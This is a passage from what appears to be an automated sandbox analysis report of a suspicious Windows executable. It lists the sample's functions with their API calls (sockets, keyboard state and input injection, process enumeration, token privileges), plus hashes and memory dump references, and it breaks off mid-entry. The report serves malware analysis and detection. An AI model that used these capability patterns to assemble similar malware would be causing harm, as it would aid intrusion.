                                        • Opcode ID: 0068392134e2d7911a39e9d6756db9c8f9b7dbfbf9737188e61e29db8478099f
                                        • Instruction ID: 066cc9fd8ab2f04cf98f59d9013a7c485d29cd053e334b99ae70789f344e48bc
                                        • Opcode Fuzzy Hash: 0068392134e2d7911a39e9d6756db9c8f9b7dbfbf9737188e61e29db8478099f
                                        • Instruction Fuzzy Hash: 91A16B752043049FC710DF28C595A2AB7E5FF88714F04889DF98A9B362DB70EE49DB92
                                        Function 00C50436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                        Download Yara Rule
                                        APIs
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C8FC08,?), ref: 00C505F0
                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C8FC08,?), ref: 00C50608
                                        • CLSIDFromProgID.OLE32(?,?,00000000,00C8CC40,000000FF,?,00000000,00000800,00000000,?,00C8FC08,?), ref: 00C5062D
                                        • _memcmp.LIBVCRUNTIME ref: 00C5064E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FromProg$FreeTask_memcmp
                                        • String ID:
                                        • API String ID: 314563124-0
                                        • Opcode ID: 98a61f71166fe418f10cd5aad7b6f1d322dd1b3a0bda66ddf3af1173719574f6
                                        • Instruction ID: 98fd072e2e78e82f5308e467818d5270cf3ddae3520148b46b4faa4782bb952d
                                        • Opcode Fuzzy Hash: 98a61f71166fe418f10cd5aad7b6f1d322dd1b3a0bda66ddf3af1173719574f6
                                        • Instruction Fuzzy Hash: 03813975A00109EFCB04DF94C984EEEB7B9FF89315F204158E916EB250DB71AE4ACB64
                                        Function 00C31391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 0b0b288709f90731b51b33e3b59ffc54f8babc19c0e3861dd867a25b017adb64
                                        • Instruction ID: bae816a60a5de2c0b7a8bcff0a4c630aef650c04dfffd772cc62ad46fcf16829
                                        • Opcode Fuzzy Hash: 0b0b288709f90731b51b33e3b59ffc54f8babc19c0e3861dd867a25b017adb64
                                        • Instruction Fuzzy Hash: D6412F31A10510AFDB257BBD9C466FE3AA5EF42370F1C4225FC29D7191E63489817772
                                        Function 00C86278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(00F1F740,?), ref: 00C862E2
                                        • ScreenToClient.USER32(?,?), ref: 00C86315
                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00C86382
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID:
                                        • API String ID: 3880355969-0
                                        • Opcode ID: 9f770ade03869f6cee0f3727e8e01d8b29b5c5e45e4da05836e30418690bf443
                                        • Instruction ID: bf8ee6f1f2bf24f9f97601f665218b306e5b3a42a1e90f264dbe4ab0a7a63ae2
                                        • Opcode Fuzzy Hash: 9f770ade03869f6cee0f3727e8e01d8b29b5c5e45e4da05836e30418690bf443
                                        • Instruction Fuzzy Hash: AB512D74A00209EFDF14EF68D880AAE7BB5FF45364F148169F9259B2A1D730EE41CB54
                                        Function 00C71AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00C71AFD
                                        • WSAGetLastError.WSOCK32 ref: 00C71B0B
                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C71B8A
                                        • WSAGetLastError.WSOCK32 ref: 00C71B94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorLast$socket
                                        • String ID:
                                        • API String ID: 1881357543-0
                                        • Opcode ID: 71a105b619de400dcdd753ae73b79be6c05f404595971decc1376365aff182c5
                                        • Instruction ID: 27f99a535efba08bebcf23ae11d72e3ae5a6b8b3bcab828a901714bd650fa7b4
                                        • Opcode Fuzzy Hash: 71a105b619de400dcdd753ae73b79be6c05f404595971decc1376365aff182c5
                                        • Instruction Fuzzy Hash: 03417F74640204AFE720AF24C886F3977E5AB44718F58C498FA1A9F2D3D772DD45CB90
                                        Function 00C2B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e168eb497d6b364c2f7451971edf85fc9cdd76f015644af18d7b46c451172d2c
                                        • Instruction ID: 1622f2c3a2da8f9c5dde9005a79512d1a38c0738b6cfe45b544efc83600c18cf
                                        • Opcode Fuzzy Hash: e168eb497d6b364c2f7451971edf85fc9cdd76f015644af18d7b46c451172d2c
                                        • Instruction Fuzzy Hash: 4B415B71A00724BFD724EF38DC41BAABBE9EB88710F10452EF451DBA82D3719D419790
                                        Function 00C656D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C65783
                                        • GetLastError.KERNEL32(?,00000000), ref: 00C657A9
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C657CE
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C657FA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: 70c42f3ebe1af14d989304ada6c95d248d64b4158319358666c231ae22e35778
                                        • Instruction ID: 72156ca5ba2eb9d13517766e083e6646790f4528deec668a41f1a52731d5f384
                                        • Opcode Fuzzy Hash: 70c42f3ebe1af14d989304ada6c95d248d64b4158319358666c231ae22e35778
                                        • Instruction Fuzzy Hash: 02415F35210615DFCB20DF15C594A2EBBE2EF59320F1984C8E95A9B362CB74FD48CB91
                                        Function 00C2D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00C16D71,00000000,00000000,00C182D9,?,00C182D9,?,00000001,00C16D71,8BE85006,00000001,00C182D9,00C182D9), ref: 00C2D910
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C2D999
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C2D9AB
                                        • __freea.LIBCMT ref: 00C2D9B4
                                          • Part of subcall function 00C23820: RtlAllocateHeap.NTDLL(00000000,?,00CC1444,?,00C0FDF5,?,?,00BFA976,00000010,00CC1440,00BF13FC,?,00BF13C6,?,00BF1129), ref: 00C23852
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: a17f1e33c645106eb9aab9a77812c363b31fe7fd98f8f1f34bd0ef700cab3495
                                        • Instruction ID: 54b709b9f82cf03f46ef60c2b9f89228e9d20e4252cb16ce6245f8e532fd2474
                                        • Opcode Fuzzy Hash: a17f1e33c645106eb9aab9a77812c363b31fe7fd98f8f1f34bd0ef700cab3495
                                        • Instruction Fuzzy Hash: F531F371A1022AABDF24DF64EC81EEE7BA5EB51310F050168FC15D7250DB35CE90DB90
                                        Function 00C852C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00C85352
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C85375
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C85382
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C853A8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LongWindow$InvalidateMessageRectSend
                                        • String ID:
                                        • API String ID: 3340791633-0
                                        • Opcode ID: 654b101063d38babcf2a49f2584f569da22bd23f9883efeb42503b668f03abdf
                                        • Instruction ID: 948ee4cdf46e72bce35ccfbd6d0ee77f87ffafddb2ba536976172724de11808c
                                        • Opcode Fuzzy Hash: 654b101063d38babcf2a49f2584f569da22bd23f9883efeb42503b668f03abdf
                                        • Instruction Fuzzy Hash: AE31E234A55A08FFEF30AA14CC45FE83761AB05399F584115FA20961F1C7F0AF40AB59
                                        Function 00C5AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00C5ABF1
                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C5AC0D
                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C5AC74
                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00C5ACC6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: bd7d5b70221d571e7760f27b4481ccf6086819c077d0e4b8426d427d8e9c62ab
                                        • Instruction ID: 30e52606af27893f2a8131a46e1af644ee30e205d520e93c4ff77797df8d9b17
                                        • Opcode Fuzzy Hash: bd7d5b70221d571e7760f27b4481ccf6086819c077d0e4b8426d427d8e9c62ab
                                        • Instruction Fuzzy Hash: 29316D34A00318AFFF34CB668C047FE7BA5AB44312F04431EECA1561D0C376AAC9976A
                                        Function 00C87674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 00C8769A
                                        • GetWindowRect.USER32(?,?), ref: 00C87710
                                        • PtInRect.USER32(?,?,00C88B89), ref: 00C87720
                                        • MessageBeep.USER32(00000000), ref: 00C8778C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID:
                                        • API String ID: 1352109105-0
                                        • Opcode ID: 2f6ca011d3483d085dbd36f8cb4dc427df5757ec0209119d6350aa37ccbfe9b5
                                        • Instruction ID: 949e1bc9360c7346464dcb80109b03d0e93c78845c367a9337458f6ec9b0e2dc
                                        • Opcode Fuzzy Hash: 2f6ca011d3483d085dbd36f8cb4dc427df5757ec0209119d6350aa37ccbfe9b5
                                        • Instruction Fuzzy Hash: 62418F34605214DFCB02EF59C894FAD77F5FB49318F2942A9E8249B261E730EA41DF94
                                        Function 00C816DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 00C816EB
                                          • Part of subcall function 00C53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C53A57
                                          • Part of subcall function 00C53A3D: GetCurrentThreadId.KERNEL32 ref: 00C53A5E
                                          • Part of subcall function 00C53A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C525B3), ref: 00C53A65
                                        • GetCaretPos.USER32(?), ref: 00C816FF
                                        • ClientToScreen.USER32(00000000,?), ref: 00C8174C
                                        • GetForegroundWindow.USER32 ref: 00C81752
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: 579bd160fe949df67c444ca1d98476efc94b1bbd50b37bfcdc9540772b86bb42
                                        • Instruction ID: 5143697b2f559d215973cb4ce61127f3c2bbe4803e618b0f542d26650087a36c
                                        • Opcode Fuzzy Hash: 579bd160fe949df67c444ca1d98476efc94b1bbd50b37bfcdc9540772b86bb42
                                        • Instruction Fuzzy Hash: 9D311E75D00149AFCB00EFA9C981DAEFBFDEF48304B5480AAE515E7211DA319E49CBA4
                                        Function 00C5D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00C5D501
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00C5D50F
                                        • Process32NextW.KERNEL32(00000000,?), ref: 00C5D52F
                                        • CloseHandle.KERNEL32(00000000), ref: 00C5D5DC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: e2c84bb853e2bccf2bca7c99c896e29443062708edb9c58e9dc6f872ead588a8
                                        • Instruction ID: fef2fb6da1f6816a81370de75edbf03d8c7571b0b377526a5a4b4de0c6b64b47
                                        • Opcode Fuzzy Hash: e2c84bb853e2bccf2bca7c99c896e29443062708edb9c58e9dc6f872ead588a8
                                        • Instruction Fuzzy Hash: 8531B3710083049FD310EF54C885BBFBBE8EF99394F50052DF586831A1EB719A88CBA2
                                        Function 00C88FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        • GetCursorPos.USER32(?), ref: 00C89001
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C47711,?,?,?,?,?), ref: 00C89016
                                        • GetCursorPos.USER32(?), ref: 00C8905E
                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C47711,?,?,?), ref: 00C89094
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                        • String ID:
                                        • API String ID: 2864067406-0
                                        • Opcode ID: 64156cb138e69615d874261420ab2ba881ed23262da1b53fc728937223274204
                                        • Instruction ID: 7250af59473ed3301cd5723c7bd7faf244298ec74daaae384fcf20dcb1e9ca0f
                                        • Opcode Fuzzy Hash: 64156cb138e69615d874261420ab2ba881ed23262da1b53fc728937223274204
                                        • Instruction Fuzzy Hash: 2821D131600018EFCB259F95CC98FFE7BB9EF4A360F184065F916972A2C7319A50EB64
                                        Function 00C5D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNEL32(?,00C8CB68), ref: 00C5D2FB
                                        • GetLastError.KERNEL32 ref: 00C5D30A
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C5D319
                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C8CB68), ref: 00C5D376
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                        • String ID:
                                        • API String ID: 2267087916-0
                                        • Opcode ID: 31e4948d0d473a8c06ed24ff3783629c70d80d026dc7af435228c02c58087cbc
                                        • Instruction ID: 56833a6d56a0dc3b1e599430b34bc7f675f15487cf17909065d4f11d529eb03c
                                        • Opcode Fuzzy Hash: 31e4948d0d473a8c06ed24ff3783629c70d80d026dc7af435228c02c58087cbc
                                        • Instruction Fuzzy Hash: 352180745053019F8720DF24C88196EB7E4AE56365F104A5DF8AAC72A1D730DA89CB9B
                                        Function 00C51571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C51014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C5102A
                                          • Part of subcall function 00C51014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C51036
                                          • Part of subcall function 00C51014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C51045
                                          • Part of subcall function 00C51014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C5104C
                                          • Part of subcall function 00C51014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C51062
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C515BE
                                        • _memcmp.LIBVCRUNTIME ref: 00C515E1
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C51617
                                        • HeapFree.KERNEL32(00000000), ref: 00C5161E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                        • String ID:
                                        • API String ID: 1592001646-0
                                        • Opcode ID: fd65a1fb1c2b9d580679f556105a7ad253f0ff69b6cb7c90ca15e8c23934123f
                                        • Instruction ID: ea075e1315a5fb50862f3d992fd63839a961a082969c0edcd60560cca7ce3e57
                                        • Opcode Fuzzy Hash: fd65a1fb1c2b9d580679f556105a7ad253f0ff69b6cb7c90ca15e8c23934123f
                                        • Instruction Fuzzy Hash: 4F218E31E40108EFDF00DFA4C989BEEB7B8EF44355F084459EC51A7241EB30AA89DB64
                                        Function 00C82782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 00C8280A
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C82824
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C82832
                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C82840
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
